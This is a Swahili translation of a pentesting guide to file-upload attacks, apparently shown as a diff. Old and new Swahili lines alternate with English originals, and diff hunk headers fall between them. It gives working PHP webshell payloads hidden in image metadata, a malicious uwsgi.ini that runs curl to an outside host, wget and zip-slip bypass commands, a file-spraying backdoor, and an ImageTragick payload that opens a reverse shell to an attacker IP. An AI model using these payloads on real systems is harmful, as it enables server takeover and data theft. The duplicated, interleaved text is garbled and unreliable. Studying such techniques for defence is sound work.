- Hudumia uploads kutoka maeneo yasiyoweza kutekelezwa.
- Upgrade unisharp/laravel-filemanager to ≥ 2.9.1.
- Lazimisha allowlists kali za server-side na thibitisha tena jina la faili lililohifadhiwa.
- Hudumia uploads kutoka maeneo yasiyo-executable.
### Bypass Content-Type, Magic Number, Compression & Resizing
- Bypass **Content-Type** checks kwa kuweka **value** ya **Content-Type** **header** kuwa: _image/png_ , _text/plain , application/octet-stream_
- Bypass **Content-Type** checks by setting the **value** of the **Content-Type** **header** to: _image/png_ , _text/plain , application/octet-stream_
1. Content-Type **wordlist**: [https://github.com/danielmiessler/SecLists/blob/master/Miscellaneous/Web/content-type.txt](https://github.com/danielmiessler/SecLists/blob/master/Miscellaneous/Web/content-type.txt)
- Bypass **magic number** check kwa kuongeza mwanzoni mwa faili **bytes of a real image** (kumdanganya amri ya _file_). Au ingiza shell ndani ya **metadata**:\
- Bypass **magic number** check by adding at the beginning of the file the **bytes of a real image** (confuse the _file_ command). Or introduce the shell inside the **metadata**:\
`exiftool -Comment="<?php echo 'Command:'; if($_POST){system($_POST['cmd']);} __halt_compiler();" img.jpg`\
`\` au pia unaweza **kuingiza payload moja kwa moja** ndani ya picha:\
`\` or you could also **introduce the payload directly** in an image:\
`echo '<?php system($_REQUEST['cmd']); ?>' >> img.png`
- Ikiwa **compression** inaongezwa kwenye picha yako, kwa mfano kwa kutumia maktaba za kawaida za PHP kama [PHP-GD](https://www.php.net/manual/fr/book.image.php), mbinu za hapo awali hazitakuwa na manufaa. Hata hivyo, unaweza kutumia **PLTE chunk** [**technique defined here**](https://www.synacktiv.com/publications/persistent-php-payloads-in-pngs-how-to-inject-php-code-in-an-image-and-keep-it-there.html) kuingiza maandishi yatakayoweza **kuishi baada ya compression**.
- If **compressions is being added to your image**, for example using some standard PHP libraries like [PHP-GD](https://www.php.net/manual/fr/book.image.php), the previous techniques won't be useful it. However, you could use the **PLTE chunk** [**technique defined here**](https://www.synacktiv.com/publications/persistent-php-payloads-in-pngs-how-to-inject-php-code-in-an-image-and-keep-it-there.html) to insert some text that will **survive compression**.
- [**Github with the code**](https://github.com/synacktiv/astrolock/blob/main/payloads/generators/gen_plte_png.php)
- Ukurasa wa wavuti pia unaweza kuwa unafanya **resizing** ya **image**, kwa mfano kwa kutumia PHP-GD functions `imagecopyresized` au `imagecopyresampled`. Hata hivyo, unaweza kutumia **IDAT chunk** [**technique defined here**](https://www.synacktiv.com/publications/persistent-php-payloads-in-pngs-how-to-inject-php-code-in-an-image-and-keep-it-there.html) kuingiza maandishi yatakayoweza **kuishi baada ya compression**.
- The web page cold also be **resizing** the **image**, using for example the PHP-GD functions `imagecopyresized` or `imagecopyresampled`. However, you could use the **IDAT chunk** [**technique defined here**](https://www.synacktiv.com/publications/persistent-php-payloads-in-pngs-how-to-inject-php-code-in-an-image-and-keep-it-there.html) to insert some text that will **survive compression**.
- [**Github with the code**](https://github.com/synacktiv/astrolock/blob/main/payloads/generators/gen_idat_png.php)
- Mbinu nyingine ya kuunda payload inayoweza **kuishi baada ya image resizing**, kwa kutumia PHP-GD function `thumbnailImage`. Hata hivyo, unaweza kutumia **tEXt chunk** [**technique defined here**](https://www.synacktiv.com/publications/persistent-php-payloads-in-pngs-how-to-inject-php-code-in-an-image-and-keep-it-there.html) kuingiza maandishi yatakayoweza **kuishi baada ya compression**.
- Another technique to make a payload that **survives an image resizing**, using the PHP-GD function `thumbnailImage`. However, you could use the **tEXt chunk** [**technique defined here**](https://www.synacktiv.com/publications/persistent-php-payloads-in-pngs-how-to-inject-php-code-in-an-image-and-keep-it-there.html) to insert some text that will **survive compression**.
- [**Github with the code**](https://github.com/synacktiv/astrolock/blob/main/payloads/generators/gen_tEXt_png.php)
### Other Tricks to check
- Tafuta udhaifu wa **kubadilisha jina** (rename) kwa faili iliyopakuliwa tayari (kubadilisha extension).
- Tafuta udhaifu wa **Local File Inclusion** ili kutekeleza backdoor.
- **Uwezekano wa ufunuo wa taarifa**:
1. Pakia **mara kadhaa** (na kwa **wakati ule ule**) **faili ile ile** yenye **jina lile lile**
2. Pakia faili yenye **jina** la **file** au **folder** ambayo **tayari ipo**
3. Kupakia faili yenye **"." , ".." , au "…" kama jina lake**. Kwa mfano, katika Apache kwenye **Windows**, ikiwa application inahifadhi uploaded files katika "/www/uploads/" directory, faili yenye jina "." itaumba faili inayoitwa "uploads" katika directory ya "/www/".
4. Pakia faili ambayo inaweza kuwa ngumu kufutwa kama **"…:.jpg"** katika **NTFS**. (Windows)
5. Pakia faili katika **Windows** yenye **invalid characters** kama `|<>*?”` ndani ya jina lake. (Windows)
6. Pakia faili katika **Windows** ukitumia majina **yaleyalo yaliyohifadhiwa** (reserved/forbidden) kama CON, PRN, AUX, NUL, COM1, COM2, COM3, COM4, COM5, COM6, COM7, COM8, COM9, LPT1, LPT2, LPT3, LPT4, LPT5, LPT6, LPT7, LPT8, na LPT9.
- Jaribu pia **kuupload executable** (.exe) au **.html** (inayoonekana kidogo) ambayo **itaweza kutekeleza code** inapofunguliwa kwa bahati mbaya na mhusika.
- Pata udhaifu wa **rename** faili iliyopakiwa (kubadilisha extension).
- Pata udhaifu wa **Local File Inclusion** ili kutekeleza backdoor.
- **Possible Information disclosure**:
1. Pakia faili ile ile **mara nyingi** (na kwa **wakati mmoja**) zikiwa na **jina lile lile**.
2. Pakia faili yenye jina la faili au folda ambayo **tayari ipo**.
3. Kupakia faili yenye jina '.' , '..' , au '...' kama jina lake. Kwa mfano, katika Apache kwenye **Windows**, ikiwa application inahifadhi uploaded files katika "/www/uploads/" directory, faili yenye jina '.' itaunda faili inayoitwa "uploads" katika "/www/" directory.
4. Pakia faili ambayo huenda isifutike kwa urahisi kama **'...:.jpg'** katika **NTFS**. (Windows)
5. Pakia faili katika **Windows** yenye **invalid characters** kama `|<>*?”` katika jina lake. (Windows)
6. Pakia faili katika **Windows** ukitumia majina yaliyohifadhiwa (forbidden) kama CON, PRN, AUX, NUL, COM1, COM2, COM3, COM4, COM5, COM6, COM7, COM8, COM9, LPT1, LPT2, LPT3, LPT4, LPT5, LPT6, LPT7, LPT8, na LPT9.
- Jaribu pia kupakia **executable** (.exe) au **.html** (inayoshindikana kuwa hatari) ambayo ita- execute code wakati mwathiriwa atakapoifunua kwa bahati mbaya.
### Special extension tricks
@ -128,17 +128,17 @@ The `.inc` extension is sometimes used for php files that are only used to **imp
## **Jetty RCE**
If you can upload a XML file into a Jetty server you can obtain [RCE because **new \*.xml and \*.war are automatically processed**](https://twitter.com/ptswarm/status/1555184661751648256/photo/1)**.** Kwa hivyo, kama ilivyoelezwa kwenye picha ifuatayo, pakia faili ya XML katika `$JETTY_BASE/webapps/` na tarajia shell!
If you can upload a XML file into a Jetty server you can obtain [RCE because **new \*.xml and \*.war are automatically processed**](https://twitter.com/ptswarm/status/1555184661751648256/photo/1)**.** So, as mentioned in the following image, upload the XML file to `$JETTY_BASE/webapps/` and expect the shell!
![https://twitter.com/ptswarm/status/1555184661751648256/photo/1](<../../images/image (1047).png>)
## **uWSGI RCE**
Kwa uchambuzi wa kina wa udhaifu huu angalia utafiti wa asili: [uWSGI RCE Exploitation](https://blog.doyensec.com/2023/02/28/new-vector-for-dirty-arbitrary-file-write-2-rce.html).
For a detailed exploration of this vulnerability check the original research: [uWSGI RCE Exploitation](https://blog.doyensec.com/2023/02/28/new-vector-for-dirty-arbitrary-file-write-2-rce.html).
Remote Command Execution (RCE) vulnerabilities zinaweza kutumiwa kwenye uWSGI servers ikiwa mtu ana uwezo wa kubadilisha `.ini` configuration file. uWSGI configuration files zinatumia sintaksia maalum kuingiza "magic" variables, placeholders, na operators. Kwa mfano, operator '@', inayotumika kama `@(filename)`, imeundwa kuingiza yaliyomo ya faili. Miongoni mwa schemes zinazotumiwa kwenye uWSGI, scheme ya "exec" ni yenye nguvu kabisa, ikiruhusu kusoma data kutoka kwenye standard output ya process. Kipengele hiki kinaweza kutumika kwa malengo mabaya kama Remote Command Execution au Arbitrary File Write/Read wakati `.ini` configuration file inapotambuliwa.
Remote Command Execution (RCE) vulnerabilities can be exploited in uWSGI servers if one has the capability to modify the `.ini` configuration file. uWSGI configuration files leverage a specific syntax to incorporate "magic" variables, placeholders, and operators. Notably, the '@' operator, utilized as `@(filename)`, is designed to include the contents of a file. Among the various supported schemes in uWSGI, the "exec" scheme is particularly potent, allowing the reading of data from a process's standard output. This feature can be manipulated for nefarious purposes such as Remote Command Execution or Arbitrary File Write/Read when a `.ini` configuration file is processed.
Tazama mfano ufuatao wa `uwsgi.ini` yenye madhara, ikionyesha schemes mbalimbali:
Consider the following example of a harmful `uwsgi.ini` file, showcasing various schemes:
```ini
[uwsgi]
; read from a symbol
@ -156,15 +156,15 @@ extra = @(exec://curl http://collaborator-unique-host.oastify.com)
; call a function returning a char *
characters = @(call://uwsgi_func)
```
Utekelezaji wa payload hutokea wakati wa kuchambua faili ya configuration. Ili configuration ianzishwe na kuchambuliwa, mchakato wa uWSGI lazima uanzishwe upya (inawezekana baada ya crash au kutokana na Denial of Service attack) au faili lazima iwe imewekwa kwa auto-reload. Kipengele cha auto-reload, ikiwa kimewezeshwa, kinakokota (reload) faili kwa interval zilizobainishwa inapogundua mabadiliko.
Utekelezaji wa payload hutokea wakati wa kuchanganua faili ya usanidi. Ili usanidi uanze na uchanganywe, mchakato wa uWSGI lazima uanzishwe upya (potentially after a crash or due to a Denial of Service attack) au faili lazima iwe imewekwa kwenye auto-reload. Kipengele cha auto-reload, ikiwa kimewezeshwa, hurudisha faili kwa vipindi vilivyowekwa baada ya kugundua mabadiliko.
Ni muhimu kuelewa unyenyekevu wa namna uWSGI inavyokagua faili zake za configuration. Hasa, payload iliyojadiliwa inaweza kuingizwa ndani ya faili ya binary (kama image au PDF), na hivyo kupanua wigo wa uwezekano wa exploitation.
Ni muhimu kuelewa upole wa jinsi uWSGI inavyochanganua faili za usanidi. Hasa, payload iliyojadiliwa inaweza kuingizwa ndani ya faili ya binary (kama image au PDF), hivyo kupanua zaidi wigo la uwezekano wa matumizi mabaya.
## **wget File Upload/SSRF Trick**
## **wget Kupakia Faili/SSRF Triki**
Kuna wakati unaweza kugundua kwamba server inatumia **`wget`** kupakua **faili** na unaweza **onyesha** **URL**. Katika kesi hizi, code inaweza kuwa inakagua kwamba extension ya faili zilizopakuliwa iko kwenye whitelist ili kuhakikisha kwamba faili zinazoruhusiwa pekee ndizo zitakapopakuliwa. Hata hivyo, **ukaguzi huu unaweza kuepukika.**\
Katika baadhi ya matukio unaweza kugundua kwamba server inatumia **`wget`** kupakua **mafayili** na unaweza **kutaja** **URL**. Katika kesi hizi, code inaweza kukagua kwamba extension ya mafaili yaliyopakuliwa iko kwenye whitelist ili kuhakikisha kwamba mafaili yanayoruhusiwa pekee ndio yatakapopakuliwa. Hata hivyo, **ukaguzi huu unaweza kupitishwa.**\
Urefu wa **kiasi cha juu** wa **jina la faili** kwenye **linux** ni **255**, hata hivyo, **wget** hukata majina ya faili hadi **236** herufi. Unaweza **pakua faili inayoitwa "A"\*232+".php"+".gif"**, jina hili la faili lita **vuka** **ukaguzi** (kama katika mfano huu **".gif"** ni extension **halali**) lakini `wget` ata **badilisha jina** la faili kuwa **"A"\*232+".php"**.
Urefu wa **jina la faili** katika **linux** ni **255**, hata hivyo, **wget** inakata majina ya faili hadi **236** herufi. Unaweza **kupakua faili inayoitwa "A"\*232+".php"+".gif"**, jina hili la faili litatoka kwenye **ukaguzi** (kwa mfano hapa **".gif"** ni extension halali) lakini `wget` itabadilisha jina la faili kuwa **"A"\*232+".php"**.
```bash
#Create file and HTTP server
echo "SOMETHING" > $(python -c 'print("A"*(236-4)+".php"+".gif")')
@ -187,17 +187,17 @@ AAAAAAAAAAAAAAAAAAAAAAAAAAAAA 100%[=============================================
2020-06-13 03:14:06 (1.96 MB/s) - AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.php saved [10/10]
```
Kumbuka kuwa **chaguo jingine** unachoweza kuwa unafikiria ili kuepuka ukaguzi huu ni kufanya **HTTP server i-redirect kwa faili tofauti**, hivyo URL ya awali itapita ukaguzi lakini wget itapakua faili iliyorejelewa iliyo na jina jipya. Hii **haitafanya kazi** **isipokuwa** wget inatumiwa kwa **parameter** `--trust-server-names` kwa sababu **wget itapakua ukurasa uliorejelewa kwa jina la faili lililoonyeshwa kwenye URL ya awali**.
Kumbuka kwamba **chaguo jingine** unaloweza kufikiriwa nalo kuzunguka ukaguzi huu ni kufanya **HTTP server i-redirect kwa faili tofauti**, hivyo URL ya awali itaingia bila kukaguliwa kisha wget itapakua faili iliyorejeshwa kwa jina jipya. Hii **haitafanya kazi** **isipokuwa** wget inatumiwa na **parameter** `--trust-server-names` kwa sababu **wget itapakua ukurasa uliorejeshwa kwa jina la faili lililoonyeshwa kwenye URL ya asili**.
## Zana
- [Upload Bypass](https://github.com/sAjibuu/Upload_Bypass) ni zana yenye nguvu iliyoundwa kusaidia Pentesters na Bug Hunters katika kujaribu mechanisms za file upload. Inatumia mbinu mbalimbali za bug bounty ili kurahisisha mchakato wa kubaini na kushambulia vunjo, ikihakikisha tathmini ya kina ya web applications.
- [Upload Bypass](https://github.com/sAjibuu/Upload_Bypass) ni zana yenye nguvu iliyoundwa kusaidia Pentesters na Bug Hunters katika kujaribu file upload mechanisms. Inatumia mbinu mbalimbali za bug bounty ili kurahisisha mchakato wa kubaini na kutumia vulnerabilities, kuhakikisha tathmini ya kina ya web applications.
### Corrupting upload indices with snprintf quirks (historical)
Baadhi ya legacy upload handlers zinazotumia `snprintf()` au mbinu zinazofanana kujenga multi-file arrays kutoka kwa single-file upload zinaweza kudanganywa kuunda kwa ajili ya kuforgesha muundo wa `_FILES`. Kutokana na kutokuwepo kwa ulinganifu na kukatwa katika tabia ya `snprintf()`, upload moja iliyotengenezwa kwa uangalifu inaweza kuonekana kama faili nyingi zenye index upande wa server, ikachanganya mantiki inayodai muundo thabiti (mfano, kuitwa multi-file upload na kuchukua matawi yasiyo salama). Ingawa ni niche leo, muundo huu wa “index corruption” mara nyingi hujitokeza tena katika CTFs na codebases za zamani.
Baadhi ya legacy upload handlers zinazotumia `snprintf()` au njia kama hiyo kujenga multi-file arrays kutoka kwa single-file upload zinaweza kudanganywa kuunda muundo wa `_FILES`. Kutokana na kutokamilika na kukatwa kwa tabia ya `snprintf()`, upload moja iliyoundwa kwa uangalifu inaweza kuonekana kama faili nyingi zilizo na index upande wa server, ikachanganya mantiki inayodhani muundo thabiti (kwa mfano, kuitenda kama multi-file upload na kuchukua matawi hatarishi). Ingawa ni niche leo, muundo huu wa “index corruption” mara kwa mara hujitokeza tena katika CTFs na codebases za zamani.
## From File upload to other vulnerabilities
## Kutoka File upload hadi vulnerabilities nyingine
- Set **filename** to `../../../tmp/lol.png` and try to achieve a **path traversal**
- Set **filename** to `sleep(10)-- -.jpg` and you may be able to achieve a **SQL injection**
@ -209,13 +209,13 @@ Baadhi ya legacy upload handlers zinazotumia `snprintf()` au mbinu zinazofanana
- [**Open Redirect** via uploading svg file](../open-redirect.md#open-redirect-uploading-svg-files)
- Try **different svg payloads** from [**https://github.com/allanlw/svg-cheatsheet**](https://github.com/allanlw/svg-cheatsheet)
- [Famous **ImageTrick** vulnerability](https://mukarramkhalid.com/imagemagick-imagetragick-exploit/)
- Ikiwa unaweza kuagiza web server ichukue picha kutoka kwa URL unaweza kujaribu kutumika kwa SSRF. Ikiwa picha hii itahifadhiwa kwenye tovuti ya **public**, unaweza pia kuonyesha URL kutoka [https://iplogger.org/invisible/](https://iplogger.org/invisible/) na **kuiba taarifa za kila mgeni**.
- If you can **indicate the web server to catch an image from a URL** you could try to abuse a [SSRF](../ssrf-server-side-request-forgery/index.html). If this **image** is going to be **saved** in some **public** site, you could also indicate a URL from [https://iplogger.org/invisible/](https://iplogger.org/invisible/) and **steal information of every visitor**.
- [**XXE and CORS** bypass with PDF-Adobe upload](pdf-upload-xxe-and-cors-bypass.md)
- PDFs zilizotengenezwa kwa njia maalum kuelekea XSS: Ukurasa ufuatao unaelezea jinsi ya **kuingiza data ya PDF ili kupata utekelezaji wa JS** (the [following page present how to **inject PDF data to obtain JS execution**](../xss-cross-site-scripting/pdf-injection.md)). Ikiwa unaweza kupakia PDFs unaweza kuandaa PDF itakayotekeleza JS yoyote kwa kufuata maelekezo yaliyotolewa.
- Pakia yaliyomo ya \[eicar]\([**https://secure.eicar.org/eicar.com.txt**](https://secure.eicar.org/eicar.com.txt)) ili kuangalia kama server ina **antivirus**
- Angalia kama kuna **size limit** wakati wa kupakia faili
- Specially crafted PDFs to XSS: The [following page present how to **inject PDF data to obtain JS execution**](../xss-cross-site-scripting/pdf-injection.md). If you can upload PDFs you could prepare some PDF that will execute arbitrary JS following the given indications.
- Upload the \[eicar]\([**https://secure.eicar.org/eicar.com.txt**](https://secure.eicar.org/eicar.com.txt)) content to check if the server has any **antivirus**
- Check if there is any **size limit** uploading files
Hapa kuna orodha ya top 10 ya vitu unavyoweza kufanikisha kwa kupakia (kutoka [here](https://twitter.com/SalahHasoneh1/status/1281274120395685889)):
Heres a top 10 list of things that you can achieve by uploading (from [here](https://twitter.com/SalahHasoneh1/status/1281274120395685889)):
1. **ASP / ASPX / PHP5 / PHP / PHP3**: Webshell / RCE
2. **SVG**: Stored XSS / SSRF / XXE
@ -240,34 +240,34 @@ https://github.com/portswigger/upload-scanner
- **PNG**: `"\x89PNG\r\n\x1a\n\0\0\0\rIHDR\0\0\x03H\0\x s0\x03["`
- **JPG**: `"\xff\xd8\xff"`
Rejea [https://en.wikipedia.org/wiki/List_of_file_signatures](https://en.wikipedia.org/wiki/List_of_file_signatures) kwa aina nyingine za filetypes.
Rejea kwa [https://en.wikipedia.org/wiki/List_of_file_signatures](https://en.wikipedia.org/wiki/List_of_file_signatures) kwa filetypes nyingine.
## Zip/Tar File Automatically decompressed Upload
Ikiwa unaweza kupakia ZIP ambayo itafunguliwa ndani ya server, unaweza kufanya mambo 2:
Ikiwa unaweza kupakia ZIP itakayofinyangwa ndani ya server, unaweza kufanya mambo 2:
### Symlink
Pakia link inayojumuisha soft links kwenda kwa faili nyingine, kisha, ukiingia kwenye faili zilizofunguliwa utapata faili zilizounganishwa:
Upload a link containing soft links to other files, then, accessing the decompressed files you will access the linked files:
```
ln -s ../../../index.php symindex.txt
zip --symlinks test.zip symindex.txt
tar -cvf test.tar symindex.txt
```
### Dekompresi katika folda tofauti
### Decompress katika folda tofauti
Uundaji usiotarajiwa wa faili katika saraka wakati wa dekompresi ni tatizo kubwa. Licha ya dhana za awali kwamba usanidi huu unaweza kulinda dhidi ya utekelezaji wa amri za OS kupitia upakiaji wa faili zenye madhara, msaada wa compression yenye muundo wa hieraki na uwezo wa directory traversal wa muundo wa ZIP unaweza kutumiwa. Hii inawawezesha wadukuzi kupitisha vikwazo na kutoroka kutoka kwa saraka salama za upload kwa kudanganya utendakazi wa dekompresi wa programu lengwa.
Uundaji usiotarajiwa wa faili kwenye saraka wakati wa decompress ni tatizo kubwa. Licha ya dhana za awali kwamba mpangilio huu unaweza kulinda dhidi ya utekelezaji wa amri za OS-level kupitia upakiaji wa faili zenye madhara, msaada wa compression wa kihierarkia na uwezo wa directory traversal wa muundo wa archive wa ZIP unaweza kutumika vibaya. Hii inawawezesha wadukuzi kupita vikwazo na kutoka katika saraka za upakiaji salama kwa kudhibiti utendaji wa decompression wa programu inayolengwa.
An automated exploit to craft such files is available at [**evilarc on GitHub**](https://github.com/ptoomey3/evilarc). The utility can be used as shown:
Exploit iliyotautomatiiza ya kutengeneza faili kama hizi inapatikana kwenye [**evilarc on GitHub**](https://github.com/ptoomey3/evilarc). Zana inaweza kutumika kama inavyoonyeshwa:
```python
# Listing available options
python2 evilarc.py -h
# Creating a malicious archive
python2 evilarc.py -o unix -d 5 -p /var/www/html/ rev.php
```
Zaidi ya hayo, chaguo la **symlink trick with evilarc** pia liko. Ikiwa lengo ni kulenga faili kama `/flag.txt`, symlink kwa faili hiyo inapaswa kuundwa kwenye mfumo wako. Hii inahakikisha kuwa evilarc haitakutana na makosa wakati wa uendeshaji wake.
Zaidi ya hayo, **symlink trick with evilarc** ni chaguo. Ikiwa lengo ni kulenga faili kama `/flag.txt`, symlink kwa faili hiyo inapaswa kuundwa kwenye mfumo wako. Hii inahakikisha kwamba evilarc haitapata makosa wakati wa utekelezaji wake.
Hapa chini kuna mfano wa Python code inayotumika kuunda faili ya zip yenye madhara:
Chini kuna mfano wa Python code unaotumika kuunda zip file ya hatari:
```python
#!/usr/bin/python
import zipfile
@ -285,11 +285,11 @@ zip.close()
create_zip()
```
**Kunyanyasa kompresi kwa file spraying**
**Kunyanyasa compression kwa file spraying**
Kwa maelezo zaidi **angalia chapisho la awali katika**: [https://blog.silentsignal.eu/2014/01/31/file-upload-unzip/](https://blog.silentsignal.eu/2014/01/31/file-upload-unzip/)
1. **Creating a PHP Shell**: Msimbo wa PHP umeandikwa kutekeleza amri zinazopitishwa kupitia `$_REQUEST`.
1. **Kuunda PHP Shell**: Msimbo wa PHP umeandikwa kutekeleza amri zinazopitishwa kupitia variable `$_REQUEST`.
```php
<?php
@ -299,14 +299,14 @@ system($cmd);
}?>
```
2. **File Spraying and Compressed File Creation**: Faili nyingi zimetengenezwa na archive ya zip imeundwa ikijumuisha faili hizi.
2. **File Spraying and Compressed File Creation**: Faili nyingi zinaundwa na archive ya zip inatengenezwa ikiwa na faili hizi.
```bash
root@s2crew:/tmp# for i in `seq 1 10`;do FILE=$FILE"xxA"; cp simple-backdoor.php $FILE"cmd.php";done
root@s2crew:/tmp# zip cmd.zip xx*.php
```
3. **Modification with a Hex Editor or vi**: Majina ya faili ndani ya zip hubadilishwa kwa kutumia vi au hex editor, kubadilisha "xxA" kuwa "../" ili kuvuka direktori.
3. **Modification with a Hex Editor or vi**: Majina ya faili ndani ya zip yamebadilishwa kwa kutumia vi au hex editor, kubadilisha "xxA" kuwa "../" ili kupita kwenye saraka.
```bash
:set modifiable
@ -316,48 +316,48 @@ root@s2crew:/tmp# zip cmd.zip xx*.php
## ImageTragic
Pakia yaliyomo haya kwa ugani wa image ili kutumia udhaifu **(ImageMagick , 7.0.1-1)** (kutokana na [exploit](https://www.exploit-db.com/exploits/39767))
Pakia yaliyomo haya kwa extension ya image ili ku-exploit udhaifu **(ImageMagick , 7.0.1-1)** (form the [exploit](https://www.exploit-db.com/exploits/39767))
```
push graphic-context
viewbox 0 0 640 480
fill 'url(https://127.0.0.1/test.jpg"|bash -i >& /dev/tcp/attacker-ip/attacker-port 0>&1|touch "hello)'
pop graphic-context
```
## Kuingiza PHP shell kwenye PNG
## Kuingiza PHP Shell kwenye PNG
Kuingiza PHP shell ndani ya IDAT chunk ya faili la PNG kunaweza kupita kwa ufanisi baadhi ya michakato ya usindikaji wa picha. Funsi za `imagecopyresized` na `imagecopyresampled` kutoka PHP-GD ni muhimu hasa katika muktadha huu, kwani kwa kawaida hutumika kwa resizing na resampling za picha, mtawalia. Uwezo wa PHP shell iliyowekwa kubaki bila kuathiriwa na shughuli hizi ni faida kubwa kwa matumizi fulani.
Kuingiza PHP shell katika chunk ya IDAT ya faili ya PNG kunaweza kuepuka kwa ufanisi baadhi ya operesheni za usindikaji wa picha. Funguo za `imagecopyresized` na `imagecopyresampled` kutoka PHP-GD zina umuhimu maalum katika muktadha huu, kwani hutumika mara kwa mara kwa kupima upya na resampling picha, kwa mtiririko huo. Uwezo wa PHP shell iliyowekwa ndani ya kukaa bila kuathiriwa na operesheni hizi ni faida muhimu kwa matumizi fulani.
Uchambuzi wa kina wa mbinu hii, pamoja na metodología na matumizi yake yanayowezekana, unapatikana katika makala ifuatayo: ["Encoding Web Shells in PNG IDAT chunks"](https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/). Rasilimali hii inatoa ufahamu mpana wa mchakato na athari zake.
Uchunguzi wa kina wa mbinu hii, ikijumuisha metodologia na matumizi yake yanayowezekana, umepangwa katika makala ifuatayo: ["Encoding Web Shells in PNG IDAT chunks"](https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/). Rasilimali hii inatoa uelewa mpana wa mchakato na athari zake.
More information in: [https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/](https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/)
Taarifa zaidi: [https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/](https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/)
## Faili za polyglot
## Polyglot Files
Faili za polyglot hutumika kama chombo cha kipekee katika usalama wa mtandao, zikifanya kazi kama chameleons zinazoweza kuwepo kwa uhalali katika muundo kadhaa wa faili kwa wakati mmoja. Mfano wa kuvutia ni a [GIFAR](https://en.wikipedia.org/wiki/Gifar), mseto unaofanya kazi kama GIF na kama archive ya RAR. Faili za namna hii hazina kikomo kwa jozi hii pekee; mchanganyiko kama GIF na JS au PPT na JS pia yanawezekana.
Polyglot files hutumika kama chombo cha kipekee katika cybersecurity, zikifanya kazi kama chameleon ambazo zinaweza kuwepo kwa uhalali katika miundo mbalimbali ya faili kwa wakati mmoja. Mfano wa kuvutia ni [GIFAR](https://en.wikipedia.org/wiki/Gifar), muunganiko ambao hufanya kazi kama GIF na pia kama archive ya RAR. Faili kama hizi hazikikwi kwa muunganisho huo pekee; mchanganyiko kama GIF na JS au PPT na JS pia yanawezekana.
Faida kuu ya faili za polyglot iko katika uwezo wao wa kupitisha hatua za usalama zinazochuja faili kulingana na aina. Mazoea ya kawaida katika programu mbalimbali ni kuruhusu aina maalum tu za faili kupakiwa—kama JPEG, GIF, au DOC—ili kupunguza hatari inayotokana na fomati zinazoweza kuwa hatari (kwa mfano, JS, PHP, au Phar). Hata hivyo, polyglot, kwa kufuata vigezo vya muundo vya aina nyingi za faili, inaweza kupita kwa siri kupitia vikwazo hivi.
Manufaa kuu ya polyglot files yako katika uwezo wao wa kukwepa hatua za usalama ambazo hupitia faili kulingana na aina. Katika matumizi ya kawaida, programu nyingi huruhusu aina maalum za faili tu kupakiwa—kama JPEG, GIF, au DOC—ili kupunguza hatari inayotokana na muundo hatari (mfano, JS, PHP, au Phar files). Hata hivyo, polyglot, kwa kuendana na vigezo vya muundo vya aina nyingi za faili, inaweza kuzipitia vikwazo hivi kwa kimyakimya.
Licha ya ufanisi wao, polyglots pia wana mipaka. Kwa mfano, ingawa polyglot inaweza kuonyesha kwa wakati mmoja faili ya PHAR (PHp ARchive) na JPEG, ufanisi wa kupakia inaweza kutegemea sera za extension za jukwaa. Ikiwa mfumo ni mkali kuhusu extensions zinazoruhusiwa, udualgawaji wa muundo wa polyglot peke yake unaweza kutokutosha kuhakikisha kupakiwa kwake.
Licha ya ufanifu wao, polyglots hukutana na mipaka. Kwa mfano, ingawa polyglot inaweza kwa wakati mmoja kuwa PHAR file (PHp ARchive) na JPEG, mafanikio ya upakiaji wake yanaweza kutegemea sera za jukwaa kuhusu extensions za faili. Ikiwa mfumo ni mkali kuhusu extensions zinazoruhusiwa, muundo wa pande mbili wa polyglot inaweza isitoshe kuhakikisha upakiaji wake.
More information in: [https://medium.com/swlh/polyglot-files-a-hackers-best-friend-850bf812dd8a](https://medium.com/swlh/polyglot-files-a-hackers-best-friend-850bf812dd8a)
Taarifa zaidi: [https://medium.com/swlh/polyglot-files-a-hackers-best-friend-850bf812dd8a](https://medium.com/swlh/polyglot-files-a-hackers-best-friend-850bf812dd8a)
### Kupakia JSON sahihi ikionekana kama PDF
### Kupakia JSON halali kana kwamba ni PDF
Jinsi ya kuepuka ugundaji wa aina za faili kwa kupakia faili halali ya JSON hata ikiwa haikuruhusiwa kwa kuigiza PDF (techniques from **[this blog post](https://blog.doyensec.com/2025/01/09/cspt-file-upload.html)**):
Jinsi ya kuepuka utambuzi wa aina za faili kwa kupakia faili ya JSON halali hata kama haikuruhusiwa kwa kuigiza kuwa ni faili ya PDF (techniques from **[this blog post](https://blog.doyensec.com/2025/01/09/cspt-file-upload.html)**):
- **`mmagic` library**: Mradi tu `%PDF` magic bytes ziko katika 1024 bytes za mwanzo inachukuliwa kuwa halali (pata mfano kutoka kwenye post)
- **`pdflib` library**: Ongeza muundo wa PDF wa bandia ndani ya field ya JSON ili library ifikiri ni PDF (pata mfano kutoka kwenye post)
- **`file` binary**: Inaweza kusoma hadi 1048576 bytes kutoka kwa faili. Tengeneza JSON kubwa kuliko hiyo ili isiweze kuchambua maudhui kama json na kisha ndani ya JSON weka sehemu ya mwanzo ya PDF halisi na itafikiri ni PDF
- **`mmmagic` library**: Iwapo tu magic bytes za `%PDF` ziko katika bytes za kwanza 1024 basi inachukuliwa kuwa halali (angalia mfano kwenye post)
- **`pdflib` library**: Ongeza muundo wa PDF bandia ndani ya field ya JSON ili library ithink ni pdf (angalia mfano kwenye post)
- **`file` binary**: Inaweza kusoma hadi 1048576 bytes kutoka kwa faili. Unda JSON kubwa zaidi ya hiyo ili isiweze kuchambua maudhui kama json, kisha ndani ya JSON weka sehemu ya mwanzo ya PDF halisi na itadhani ni PDF
## Marejeleo
- [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20insecure%20files](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20insecure%20files)
